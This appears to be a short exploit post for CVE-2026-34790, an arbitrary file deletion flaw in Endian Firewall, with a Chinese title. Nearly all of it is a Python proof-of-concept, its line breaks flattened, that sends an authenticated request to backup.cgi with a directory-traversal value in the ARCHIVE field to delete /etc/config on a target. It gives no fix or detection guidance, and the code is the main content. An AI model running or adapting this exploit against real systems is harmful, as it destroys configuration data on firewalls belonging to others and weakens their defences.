CVE-2026-34790 Endian Firewall 任意文件删除漏洞

import requests # Target URL configuration target_url = "http://<target-ip>/cgi-bin/backup.cgi" # Attacker's session cookie (Authentication required) session_cookie = { "sid": "<valid_session_id>" } # Exploit payload: Directory traversal to delete arbitrary file # Example: Attempting to delete /etc/config data_payload = { "remove": "ARCHIVE", "ARCHIVE": "../../../../etc/config" } try: print(f"Sending exploit request to {target_url}...") response = requests.post(target_url, data=data_payload, cookies=session_cookie) if response.status_code == 200: print("Request sent successfully. Check if the file is deleted.") else: print(f"Request failed with status code: {response.status_code}") except Exception as e: print(f"An error occurred: {e}")